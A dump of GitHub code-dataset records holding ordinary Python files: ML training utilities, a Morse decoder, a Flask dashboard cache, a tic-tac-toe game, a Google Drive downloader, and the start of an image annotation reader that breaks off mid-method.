model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_\n\n Parameters:\n - **pretrained** (bool): If True, returns a model pre-trained on ImageNet\n - **progress** (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n model = ResNetFast(BasicBlock, [2, 2, 2, 2])\n state_dict = load_state_dict_from_url(model_urls['resnet18'],\n progress=progress)\n model.load_state_dict(state_dict, strict=False)\n del model.fc\n\n return model\n","repo_name":"thuml/OpenDG-DAML","sub_path":"src/tools/daml_utils.py","file_name":"daml_utils.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"929591379","text":"import numpy as np\nimport os, pickle, sys\nfrom torch.utils.data import Sampler\nfrom torch._six import int_classes as _int_classes\nimport random\nimport torch, torchvision\nfrom PIL import Image\nfrom torchvision.datasets.folder import ImageFolder\nimport torch.distributed as dist\nimport torch.distributions.bernoulli as ber\nimport torch.nn.functional as F\ndef _flatten(values):\n if isinstance(values, np.ndarray) or torch.is_tensor(values):\n yield values.flatten()\n else:\n for value in values:\n yield from _flatten(value)\n\ndef flatten(values):\n # flatten nested lists of np.ndarray to np.ndarray\n return np.concatenate(list(_flatten(values)))\n\ndef flatten_torch_tensor(values):\n # flatten nested lists of np.ndarray to np.ndarray\n return torch.cat(list(_flatten(values)), 0)\n\ndef _unflatten(flat_values, prototype, offset):\n if isinstance(prototype, np.ndarray):\n shape = prototype.shape\n new_offset = offset + np.product(shape)\n value = flat_values[offset:new_offset].reshape(shape)\n return value, new_offset\n else:\n result = []\n for value in prototype:\n value, offset = _unflatten(flat_values, value, offset)\n result.append(value)\n return result, offset\n\ndef unflatten(flat_values, prototype):\n # unflatten np.ndarray to nested lists with structure of prototype\n result, offset = _unflatten(flat_values, prototype, 0)\n assert(offset == len(flat_values))\n return result\n\ndef _unflatten_torch_tensor(flat_values, prototype, offset):\n if torch.is_tensor(prototype):\n shape = prototype.shape\n new_offset = offset + prototype.numel()\n value = flat_values[offset:new_offset].reshape(shape)\n return value, new_offset\n else:\n result = []\n for value in prototype:\n value, offset = _unflatten_torch_tensor(flat_values, value, offset)\n result.append(value)\n return result, offset\n\ndef unflatten_torch_tensor(flat_values, prototype):\n # unflatten np.ndarray to nested lists with structure of prototype\n result, offset = _unflatten_torch_tensor(flat_values, prototype, 0)\n assert(offset == len(flat_values))\n return result\n\ndef quantize_tensor(a):\n sign = torch.sign(a)\n abs_a = torch.abs(a)\n max_a = torch.max(abs_a)\n sampled = ber.Bernoulli(abs_a / max_a).sample()\n return torch.mul(sign*max_a, sampled)\n\n\nclass ToNumpy(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return np.array(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Groupwise_Sampler(Sampler):\n r\"\"\"Samples elements from [0,..,len(weights)-1] with given probabilities (weights).\n\n Arguments:\n weights (sequence) : a sequence of weights, not necessary summing up to one\n num_samples (int): number of samples to draw\n replacement (bool): if ``True``, samples are drawn with replacement.\n If not, they are drawn without replacement, which means that when a\n sample index is drawn for a row, it cannot be drawn again for that row.\n \"\"\"\n\n def __init__(self, dataset, replacement=True):\n self.dataset = dataset\n self.replacement = replacement\n self.group_indicator = np.zeros( (len(self.dataset), ) )\n self.importance = np.ones( (len(self.dataset), ) )\n self.cur_sample_index = 0\n self.group_index = 0\n self.last_update_iteration = -1\n\n def update_importance(self, iteration, update_batchsize, model, device='cuda'):\n\n if iteration > self.last_update_iteration:\n self.group_index += 1\n self.last_update_iteration = iteration\n\n start_index = self.cur_sample_index\n end_index = min(self.cur_sample_index + update_batchsize, len(self.dataset) )\n\n data, label = self.dataset.get_slice(start_index, end_index)\n\n ## compute sample importances\n data = data.to(device)\n label = label.to(device)\n output = model(data)\n presam_losses = F.cross_entropy(output, label, reduction='none')\n\n\n self.importance[start_index:end_index] = presam_losses.detach().cpu().numpy()\n self.group_indicator[start_index:end_index] = self.group_index\n\n if end_index == len(self.dataset):\n self.cur_sample_index = 0\n else:\n self.cur_sample_index = end_index\n\n def __iter__(self):\n counter = 0\n\n while True:\n group_member_location = self.group_indicator==self.group_index\n group_importances = self.importance[group_member_location]\n group_importances = group_importances + np.mean(group_importances)\n group_importances = group_importances / np.sum(group_importances)\n\n # this is just the group index, need to convert back to global index\n index_list = torch.multinomial(torch.Tensor(group_importances),\n 1, self.replacement).tolist()\n group_member_index = group_member_location.nonzero()[0]\n for i in group_member_index[np.array(index_list)]:\n yield i\n counter += 1\n if counter >= len(self.dataset):\n return\n\n def __len__(self):\n return self.num_samples\n\nclass SampleImageFolder(ImageFolder):\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (index, sample, target) where target is class_index of the target class.\n index in the location of the sample in the whole dataset\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return index, sample, target\n\nclass Average(object):\n\n def __init__(self):\n self.sum = 0\n self.count = 0\n\n def update(self, value, number):\n self.sum += value * number\n self.count += number\n\n @property\n def average(self):\n return self.sum / self.count\n\n def __str__(self):\n return '{:.6f}'.format(self.average)\n\nclass EMAverage(object):\n\n def __init__(self, alpha=0.9):\n self.first_update = True\n self.value = 0\n self.alpha = alpha\n\n def update(self, value):\n\n if self.first_update:\n self.value = value\n self.first_update = False\n else:\n self.value = self.alpha*self.value + (1 - self.alpha) * value\n\n\n def __str__(self):\n return '{:.6f}'.format(self.value)\n\n\nclass Accuracy(object):\n\n def __init__(self):\n self.correct = 0\n self.count = 0\n\n def update(self, output, label):\n predictions = output.data.argmax(dim=1)\n correct = predictions.eq(label.data).sum().item()\n\n self.correct += correct\n self.count += output.size(0)\n\n @property\n def accuracy(self):\n return self.correct / self.count\n\n def __str__(self):\n return '{:.2f}%'.format(self.accuracy * 100)\n\nclass My_CIFAR10(torchvision.datasets.CIFAR10):\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n img, target = self.data[index], self.targets[index]\n\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return index, img, target\n\n def get_slice(self, start, end):\n imgs = []\n targets = []\n\n for i in range(start, end):\n index, img, target = self[i]\n imgs.append(img)\n targets.append(target)\n\n return torch.stack(imgs), torch.LongTensor(targets)\n\n\n\n\n\n\ndef allreduce(t):\n \"\"\" Implementation of a ring-reduce. \"\"\"\n rank = dist.get_rank()\n size = dist.get_world_size()\n\n tensors = torch.chunk(t, size)\n assert len(tensors) == size\n\n\n recv_buff_1 = torch.zeros(tensors[0].size())\n recv_buff_2 = torch.zeros(tensors[-1].size())\n\n left = ((rank - 1) + size) % size\n right = (rank + 1) % size\n\n for i in range(size - 1):\n send_slice_idx = ((-i % size) + rank ) % size\n rec_slice_idx = (rank - i - 1) % size\n\n recv_buff = recv_buff_2 if rec_slice_idx == len(tensors) -1 else recv_buff_1\n\n send_req = dist.isend(tensors[send_slice_idx], right)\n\n dist.recv(recv_buff, left)\n tensors[rec_slice_idx][:] += recv_buff\n\n send_req.wait()\n\n\n for i in range(size - 1):\n send_slice_idx = (1 + rank - i ) % size\n rec_slice_idx = ( rank- i) % size\n\n\n recv_buff = recv_buff_2 if rec_slice_idx == len(tensors) -1 else recv_buff_1\n\n send_req = dist.isend(tensors[send_slice_idx], right)\n\n dist.recv(recv_buff, left)\n tensors[rec_slice_idx][:] = recv_buff\n\n send_req.wait()\n\n\n return torch.cat(tensors,0)\n\n\n\n\nif __name__ == '__main__':\n weights = [0 if i>10 else 1 for i in range(1,101)]\n weights_new = [1-i for i in weights]\n sampler = WeightedRandomSampler_2(weights, len(weights))\n\n a = iter(sampler)\n\n for idx, a1 in enumerate(a):\n if idx > 10:\n sampler.update_weights(weights_new)\n print(idx, a1)\n","repo_name":"AIoT-MLSys-Lab/Mercury","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":10009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42985258692","text":"from english_to_morse_translator import MORSE_CODE_DICT\nimport re\n\ndef decrypt_message(message):\n word = ''\n letter = ''\n sentence = ''\n space = 1\n vals = MORSE_CODE_DICT.values()\n keys = MORSE_CODE_DICT.keys()\n new_dict = dict(zip(vals,keys))\n for symbol in message:\n if not symbol.isspace():\n letter += symbol\n space = 1\n else:\n if space == 1:\n word += new_dict[letter]\n letter = ''\n space += 1\n elif space == 2:\n space = 1\n sentence += word+\" \"\n word = ''\n return sentence+word\n\nfile = open('code.txt','r')\noutput = open('decode.txt','w')\n# print(' '.join(file.read().splitlines()))\n# file.seek(0)\nres = decrypt_message(' '.join(file.read().splitlines()))\nres = re.split('(?<=[.!?]) +',res)\n# \" \".join([sentence.capitalize() for sentence in res])\noutput.write(\" \".join([sentence.capitalize() for sentence in res]))\nfile.close()\noutput.close()\n\n\n\n\n","repo_name":"nikgun1984/Code_Morse_Translator","sub_path":"morse_to_english_translator.py","file_name":"morse_to_english_translator.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7572538495","text":"\"\"\"\n Contains the in memory cache used to increase the FMD performance.\n\"\"\"\nimport datetime\nfrom multiprocessing import Lock\n\nfrom flask_monitoringdashboard.core.rules import get_rules\nfrom flask_monitoringdashboard.database import session_scope\nfrom flask_monitoringdashboard.database.endpoint import (\n get_last_requested,\n get_endpoints_hits,\n get_endpoint_averages,\n update_last_requested,\n)\n\nmemory_cache = {}\nmutex = Lock()\n\n\nclass EndpointInfo(object):\n \"\"\"\n Info about an endpoint that is stored in the memory cache.\n \"\"\"\n\n def __init__(self, last_requested=None, average_duration=None, hits=None):\n # timestamp of the most recent request\n self.last_requested = last_requested\n # all-time average duration\n self.average_duration = average_duration if average_duration else 0\n # all-time number of requests\n self.hits = hits if hits else 0\n\n def set_last_requested(self, last_requested):\n with mutex:\n self.last_requested = last_requested\n\n def set_duration(self, duration):\n with mutex:\n self.average_duration = (self.average_duration * self.hits + duration) / float(\n self.hits + 1\n )\n self.hits += 1\n\n def get_duration(self):\n with mutex:\n return self.average_duration\n\n\ndef init_cache():\n \"\"\"\n This should be added to the list of functions that are executed before the first request.\n It initializes the in-memory cache from the db\n \"\"\"\n global memory_cache\n with session_scope() as session:\n last_req_dict = dict(get_last_requested(session))\n hits_dict = dict(get_endpoints_hits(session))\n averages_dict = dict(get_endpoint_averages(session))\n for rule in get_rules():\n memory_cache[rule.endpoint] = EndpointInfo(\n last_requested=last_req_dict.get(rule.endpoint),\n average_duration=averages_dict.get(rule.endpoint),\n hits=hits_dict.get(rule.endpoint),\n )\n\n\ndef update_last_requested_cache(endpoint_name):\n \"\"\"\n Use this instead of updating the last requested to the database.\n \"\"\"\n global memory_cache\n memory_cache.get(endpoint_name).set_last_requested(datetime.datetime.utcnow())\n\n\ndef update_duration_cache(endpoint_name, duration):\n \"\"\"\n Use this together with adding a request to the database.\n \"\"\"\n global memory_cache\n memory_cache.get(endpoint_name).set_last_requested(datetime.datetime.utcnow())\n memory_cache.get(endpoint_name).set_duration(duration)\n\n\ndef get_avg_endpoint(endpoint_name):\n \"\"\"\n Return the average of the request duration for an endpoint.\n \"\"\"\n global memory_cache\n return memory_cache.get(endpoint_name).get_duration()\n\n\ndef get_last_requested_overview():\n \"\"\"\n Get the last requested values from the cache for the overview page.\n \"\"\"\n global memory_cache\n return [(endpoint_name, endpoint_info.last_requested) for endpoint_name, endpoint_info in memory_cache.items]\n\n\ndef flush_cache():\n \"\"\"\n Flushes cache changes to the db. To be called at shut down.\n \"\"\"\n global memory_cache\n if not memory_cache:\n return\n with session_scope() as session:\n for endpoint_name, endpoint_info in memory_cache.items():\n if endpoint_info.last_requested:\n update_last_requested(session, endpoint_name, endpoint_info.last_requested)\n","repo_name":"flask-dashboard/Flask-MonitoringDashboard","sub_path":"flask_monitoringdashboard/core/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":717,"dataset":"github-code","pt":"16"} +{"seq_id":"32536531947","text":"from funcoes.dados.banco_de_dados import *\n\nfrom time import sleep\n\np1 = p2 = escolhido = pts_jogador_x = pts_jogador_o = 0\n\n\ndef opcao1_menuprincipal(arq):\n titulo('CRIANDO JOGADORES')\n nome = str(input(f'Nome do Jogador: ')).strip()\n cadastrar(arq, nome, 0)\n jogadores = carregar_arquivo(arq)\n return jogadores\n\n\ndef opcao2_menuprincipal(jogadores, arq, c):\n if len(jogadores) < 2:\n print('Você precisa criar mais Jogador')\n else:\n pronto = escolhadeJogadores(jogadores)\n if pronto:\n op = menuprincipal(['Continuar?', 'Voltar?'], 'Começar a Partida')\n if op == 1:\n opcao_1(c, jogadores)\n atualizaarquivo(arq, jogadores)\n\n\ndef opcao_1(c, jogadores):\n resp = \" \"\n while resp != \"N\":\n duelistas = sorteio(resp, c, jogadores)\n matriz, simbolo = construimatriz3x3()\n mostrajogo(matriz)\n while not finalizando(matriz, duelistas, jogadores):\n simbolo = jogando(matriz, simbolo)\n print('==' * 15)\n sleep(0.3)\n mostrajogo(matriz)\n print(f'FINALIZANDO A {c}ª PARTIDA!')\n sleep(1)\n print('°°' * 20)\n c += 1\n resp = str(input('Quer Continuar? [S/N]')).strip().upper()[0]\n troca_devalores(jogadores, resp, c, trade=True)\n\n\ndef construimatriz3x3():\n \"\"\"\n -> função cria uma traiz 3x3(lista composta) e retorna essa matriz\n para o programa principal na variavel retorno (m)\n param matriz: lista composta(matriz)\n \"\"\"\n matriz = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n simb = 'X'\n return matriz, simb\n\n\ndef mostrajogo(matriz):\n \"\"\"\n -> Função mostrar a matriz\n \"\"\"\n print('+---+---+---+')\n for linha in range(0, 3):\n for coluna in range(0, 3):\n print(f'|{matriz[linha][coluna]:^3}', end='')\n print('|')\n print('+---+---+---+')\n\n\ndef jogando(matriz, simb):\n \"\"\"\n -> função responsável para fazer o pedido da entrada de valor pelo teclado, para assim realizar a troca de\n valores na função ;Troca().\n param simb: valor str de 'O' ou 'X' que vai ser aplicado na matriz.\n param res: valor bool que retornará da função troca().\n param pos: valor int que retornará da função validadorInt() que é aonde o Jogador do momento quer fazer\n seu lance.\n \"\"\"\n res = False\n while not res:\n pos = validadorInt(f'Vai Jogar [{simb}] em qual posição? ')\n res = troca(matriz, pos, simb)\n if not res:\n if pos < 1 or pos > 0:\n print('ERRO!Digite um valor entre 1 e 9')\n else:\n print('ERRO: Lugar ocupado!')\n else:\n simb = trocajogador(simb)\n return simb\n\n\ndef troca(matriz, posicao, simbolo):\n \"\"\"\n -> função que verifica se o valor do param: 'posicao' está dentro da matriz, caso sim, troca-se o valor\n do param: 'posicao' pelo valor do param: 'simbolo' e retorna um valor 'ok = True'\n OBS: somente haverá subistituicao se for um valor int por str, caso contrário repetirá o pedido do param:\n 'posicao' retronando valor 'ok = False'.\n param posicao: é a entrada de valor int solicitada ao usuário, para que ele informe onde ele quer jogar\n param simbolo: é o valor que subistituirá o número da matriz\n param matriz: é a matriz construída inicialmente por int que ao decorrer do jogo por conta desta função\n terá elementos dela constituída por str.\n \"\"\"\n ok = False\n for linha in range(0, 3):\n for coluna in range(0, 3):\n if matriz[linha][coluna] == posicao:\n matriz[linha][coluna] = simbolo\n ok = True\n return ok\n\n\ndef trocajogador(simbolo):\n \"\"\"\n -> Função que realiza a troca da variante: simbolo de 'X' por 'O' a cada lance realizado com sucesso.\n ou seja a cada troca realizada pela função 'troca()'\n param simbolo: é uma variavel string que vai retornar\n \"\"\"\n if simbolo == 'X':\n simbolo = 'O'\n else:\n simbolo = 'X'\n return simbolo\n\n\ndef finalizando(matriz, duelistas, jogadores):\n \"\"\"\n -> Função responsavel pela validação se a partida terminou ou não, dando um return a cada vez que é chamada\n de 'False' ou 'True' dependendo das regras de finalização do jogo da velha, por tanto quando o jogo chegar\n em uma posição vencedora ou empatadora, o retorno do param acabar = 'True' encerra o loop da partida.\n param vp_x: é o parâmetro boolean responsavel para dizer se o jogador com o simb = 'X' ou não.\n param vp_o: é o parâmetro boolean responsavel para dizer se o jogador com o simb = 'O' ou não.\n param acabar: é o parâmetro boolean que determina se a partida encerrou ou não.\n param empate: é o parâmetro boolean para defenir se houve empate para os jogadores.\n para cont: é o parâmetro que vai ajudar na lógica de definição de encerramento da partida, caso não haja\n mais casas para se jogar, este param contabilizar a possibilidades de jogadas e caso seja int(0) então\n o jogo deve ser encerrado.\n \"\"\"\n global pts_jogador_o, pts_jogador_x\n empate = False\n cont = 0\n acabar, vitoria_do_x, vitoria_do_o = analises(matriz)\n atribuindo_ponto(vitoria_do_x, vitoria_do_o)\n analisando_empate(matriz, cont)\n if acabar:\n if not vitoria_do_x and not vitoria_do_o:\n pts_jogador_x += 0.5\n pts_jogador_o += 0.5\n print('Empatou')\n empate = True\n placar(vitoria_do_x, vitoria_do_o, empate, duelistas, jogadores)\n return acabar\n\n\ndef analisando_empate(matriz, cont):\n acabar = False\n for linha in range(0, 3):\n for coluna in range(0, 3):\n if matriz[linha][coluna] != 'X' and matriz[linha][coluna] != 'O':\n cont += 1\n if cont == 0:\n acabar = True\n return acabar\n\n\ndef analises(matriz):\n acabar = vitoria_do_x = vitoria_do_o = False\n acabar, vitoria_do_x, vitoria_do_o = analisando_linha(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_coluna(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_diagonal_pri(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_diagonal_sec(matriz, acabar, vitoria_do_x, vitoria_do_o)\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_linha(matriz, acabar, vitoria_do_x, vitoria_do_o):\n for linha in range(0, 3):\n if matriz[linha][0] == matriz[linha][1] == matriz[linha][2]:\n if matriz[linha][0] == 'X':\n vitoria_do_x = True\n if matriz[linha][0] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_coluna(matriz, acabar, vitoria_do_x, vitoria_do_o):\n for coluna in range(0, 3):\n if matriz[0][coluna] == matriz[1][coluna] == matriz[2][coluna]:\n if matriz[0][coluna] == 'X':\n vitoria_do_x = True\n if matriz[0][coluna] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_diagonal_pri(matriz, acabar, vitoria_do_x, vitoria_do_o):\n if matriz[0][0] == matriz[1][1] == matriz[2][2]:\n if matriz[0][0] == 'X':\n vitoria_do_x = True\n if matriz[0][0] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_diagonal_sec(matriz, acabar, vitoria_do_x, vitoria_do_o):\n if matriz[0][2] == matriz[1][1] == matriz[2][0]:\n if matriz[0][2] == 'X':\n vitoria_do_x = True\n if matriz[0][2] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef atribuindo_ponto(vitoria_do_x, vitoria_do_o):\n global pts_jogador_o, pts_jogador_x\n if vitoria_do_x:\n pts_jogador_x += 1\n elif vitoria_do_o:\n pts_jogador_o += 1\n\n\ndef lin(tam=42):\n return '-'*tam\n\n\ndef titulo(msg):\n \"\"\"\n -> função para definir um título com melhor estética.\n param msg: é a entrada de uma string que vai servir de cabeçalho.\n \"\"\"\n print(lin())\n print(msg.center(42))\n print(lin())\n\n\ndef menuprincipal(lista, msg):\n \"\"\"\n -> funcão a qual dá estrutura ao menu principal dando print() de cada item de uma lista por cada vez que\n realiza um laço de repetição.\n param lista: contem itens (strings) que informam ao usuário de forma interativa suas opções.\n param msg: o conteúdo principal do cabeçalho, para formar o titulo do menu de forma mais estética.\n param c: é uma variavel para definir o índice de opções baseado na quantidade de itens do 'param lista'.\n param r: é a variável solicitada ao usuário para definir sua escolha com base nas informações montada por\n esta função. retornando a variavel 'r' ao programa principal para segmento do programa.\n \"\"\"\n titulo(msg)\n c = 1\n for item in lista:\n print(f'{c} - {item}')\n c += 1\n r = validadorInt('Opção: ')\n return r\n\n\ndef validadorInt(msg):\n \"\"\"\n -> esta função possui o objetivo de validar informações de caracter inteiro. que a priore são usadas nas\n interações do usuário com o menu do programa ou a tabela de jogadores e o tabuleiro do jogo.\n \"\"\"\n ok = False\n while not ok:\n try:\n n = int(input(msg))\n except(TypeError, ValueError):\n print('Digite um número inteiro válido')\n else:\n ok = True\n return n\n\n\ndef escolhadeJogadores(jogadores):\n \"\"\"\n -> esta tem por função selecionar dois jogadores, dos quais estão dentro da lista com os dados de todos os\n jogadores registrados, não podendo jogar participantes com os memos nomes. Sendo assim uma condição\n necessária para que a partida comece.\n \"\"\"\n titulo('CARREGAR JOGADORES')\n global p1, p2\n if len(jogadores) == 0:\n print('NÃO HÁ JOGADORES REGISTRADO')\n return False\n for cod, j in enumerate(jogadores):\n print(f'{cod} - {j[\"nome\"]}')\n p1, p2 = validadordejogadores(jogadores)\n jogador1 = jogadores[p1]['nome']\n jogador2 = jogadores[p2]['nome']\n ok = True\n print(f'Os jogadores Escolhido foram \"{jogador1}\" e \"{jogador2}\"')\n return ok\n\n\ndef validadordejogadores(jogadores):\n \"\"\"\n -> esta função não permite que a escolha do jogadores seja feita de forma correta e evitando problemas é\n por tanto um validador de escolha dos jogadores como o próprio nome já diz.\n \"\"\"\n while True:\n player1 = validadorInt('Escolha O primeiro Jogador: ')\n if 0 <= player1 < len(jogadores):\n print(f'O 1ª Jogador é {jogadores[player1][\"nome\"]}')\n break\n while True:\n player2 = validadorInt('Escolha O Segundo Jogador: ')\n if player1 == player2:\n print('ERRO! Você não pode escolher o mesmo jogador!')\n elif 0 <= player2 < len(jogadores):\n print(f'O 2ª Jogador é {jogadores[player2][\"nome\"]}')\n break\n return player1, player2\n\n\ndef sorteio(resposta, contador, jogadores):\n \"\"\"\n -> tem for função sortear quem vai começar a partida e fazer as alterações ou trocas de valores do placar do\n jogador vitorioso de 'X' que na proxima rodada vai ficar com 'O':\n EX: 'Fulano' que está com 'X' e 'zero' pontos\n 'Beltrano que está com 'O' e 'zero' pontos\n e caso 'Fulano' ganhe na próxima partida ele ficará\n 'Fulano' jogando de 'O' está com '1' ponto\n 'Beltrano' jogando de 'X' está com '0' ponto.\n \"\"\"\n global pts_jogador_o, pts_jogador_x\n duelistas = [\"\", \"\"]\n print(lin())\n troca_devalores(jogadores, resposta, contador)\n if contador % 2 != 0:\n duelistas[0] = jogadores[p1][\"nome\"]\n duelistas[1] = jogadores[p2][\"nome\"]\n print(f'{duelistas[0]} vai começar a partida')\n else:\n print(f'{jogadores[p2][\"nome\"]} vai começar a partida')\n duelistas[0] = jogadores[p2][\"nome\"]\n duelistas[1] = jogadores[p1][\"nome\"]\n return duelistas\n\n\ndef troca_devalores(jogadores, resposta, contador, trade=False):\n global pts_jogador_x, pts_jogador_o\n if not trade:\n if resposta == \"S\":\n pts_jogador_o, pts_jogador_x = pts_jogador_x, pts_jogador_o\n jogadores[p1]['ponto'], jogadores[p2]['ponto'] = jogadores[p2]['ponto'], jogadores[p1]['ponto']\n elif trade:\n if resposta == 'N' and contador > 2:\n jogadores[p1]['ponto'], jogadores[p2]['ponto'] = jogadores[p2]['ponto'], jogadores[p1]['ponto']\n\n\ndef placar(vp_x, vp_o, emp, duelistas, jogadores):\n \"\"\"\n -> está função altera o valor (key) 'ponto' do jogador que está dentro da lista de jogadores, caso ganhe\n +1 ponto, caso empate +0.5 para ambos jogadores. informando assim o placar temporário e posteriormente\n alterando a lista de jogadores que séra registrada em documento.\n \"\"\"\n print(lin(10))\n print(f'{duelistas[0]} de X: {pts_jogador_x} pts')\n print(f'{duelistas[1]} de O: {pts_jogador_o} pts')\n if vp_x:\n jogadores[p1]['ponto'] += 1\n elif vp_o:\n jogadores[p2]['ponto'] += 1\n elif emp:\n jogadores[p1]['ponto'] += 0.5\n jogadores[p2]['ponto'] += 0.5\n\n\ndef ranking(jogadores):\n \"\"\"\n -> tal função tem por objetivo organizar a lista temporária de jogadores por ordem de maior pontuador até\n o menor pontuador e apresenta-los de forma mais agradavél ao usuário.\n \"\"\"\n for c in range(0, len(jogadores) - 1):\n for i in range(c, len(jogadores)):\n if jogadores[c]['ponto'] < jogadores[i]['ponto']:\n jogadores[c], jogadores[i] = jogadores[i], jogadores[c]\n titulo('RANKING DOS JOGADORES')\n for r, j in enumerate(jogadores):\n print(f'{r+1:}ª - {j[\"nome\"]:.<30} {j[\"ponto\"]} pts')\n print(lin())\n","repo_name":"Felipe-builder/jogo_da_velha","sub_path":"funcoes/logica.py","file_name":"logica.py","file_ext":"py","file_size_in_byte":14025,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29158556382","text":"from googleapiclient.discovery import build\nfrom apiclient.http import MediaFileUpload, MediaIoBaseDownload\nimport io\nimport threading\nimport csv\nimport time\nclass DownloadManager:\n def __init__(self, creds):\n self.creds = creds\n \n def downloadFile(self, fid, fname):\n service = build('drive','v3', credentials=self.creds)\n request = service.files().get_media(fileId=fid)\n fh = io.FileIO('{}.png'.format(fname),'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print(\"GET: {}\".format(fname)) \n\n\n def getList(self):\n service = build('drive','v3', credentials=self.creds)\n results = service.files().list(\n fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n itemList = []\n \n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id']))\n itemList.append({'fname':item['name'], 'fid':item['id']})\n i=0\n with open(\"itemList.csv\", 'w') as f:\n \n fieldnames=['fname','fid']\n fwriter = csv.DictWriter(f,fieldnames=fieldnames)\n for item in itemList:\n i+=1\n fwriter.writerow(item)\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! {} rows written to itemList.csv\".format(i))\n\n def downloadFromListThread(self, filePath):\n itemList = []\n with open(filePath,'r') as csvlist:\n csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])\n for row in csv_reader:\n line = {}\n line['fid']=row['fid']\n line['fname']=row['fname']\n itemList.append(line)\n\n threads = []\n for item in itemList:\n thread = threading.Thread(target=self.downloadFile, args=(item['fid'],item['fname'],)) \n threads.append(thread)\n \n t1 = time.perf_counter()\n i=0\n for thread in threads:\n thread.start()\n print(\"HIT: {}\".format(itemList[i]['fname']))\n i+=1\n \n i=0\n for thread in threads:\n thread.join()\n i+=1\n \n t2 = time.perf_counter()\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! {} Files downloaded, {}m {}s Elapsed \".format(i, int((t2-t1)/60), int(t2-t1)%60))\n\n def downloadFromListRegular(self, filePath):\n with open(filePath,'r') as csvlist:\n csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])\n t1 = time.perf_counter()\n i = 0\n for row in csv_reader:\n print(\"HIT: {}\".format(row['fname']))\n self.downloadFile(row['fid'],row['fname'])\n i+=1\n t2 = time.perf_counter()\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! {} Files downloaded, {}m {}s Elapsed \".format(i, int((t2-t1)/60), int(t2-t1)%60))\n \n\n\n\n","repo_name":"maneeshpm/Multithreaded-downloader-for-google-drive-API","sub_path":"DownloadManager.py","file_name":"DownloadManager.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"12784300419","text":"import shutil\nimport xml.etree.ElementTree as et\nfrom pathlib import Path\nfrom typing import List, Optional, NamedTuple\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.utils import load_img, img_to_array\nimport tensorflow.keras.backend as K\n\n\nEFFICIENT_NET_SIZES = ((224,7), (240,7), (260,8), (300,9), (380,11), (456,14), (528,16), (600,18))\n\n\nclass Rectangle(NamedTuple):\n \"\"\"Хранит координаты прямоугольника (xmin, ymin) - (xmax, ymax)\"\"\"\n\n xmin: int\n ymin: int\n xmax: int\n ymax: int\n\n @property\n def w(self) -> int:\n \"\"\"Ширина\"\"\"\n return self.xmax - self.xmin\n\n @property\n def h(self) -> int:\n \"\"\"Высота\"\"\"\n return self.ymax - self.ymin\n\n @property\n def square(self) -> float:\n \"\"\"Площадь\"\"\"\n return self.w * self.h\n\n def __repr(self) -> str:\n return f'Rectangle(x1={self.xmin},y1={self.ymin},x2={self.xmax},y2={self.ymax})'\n\n\nclass Annotation(NamedTuple):\n \"\"\"Аннотация к изображению - bbox + класс объекта\"\"\"\n label: str\n bbox: Rectangle\n\n\nclass AnnotationFileReader:\n \"\"\"Чтение файла с аннотациями из LADD (Pascal VOC)\"\"\"\n\n def __init__(self, filepath: str) -> None:\n self.filepath: Path = Path(filepath)\n\n def read_annotations(self) -> 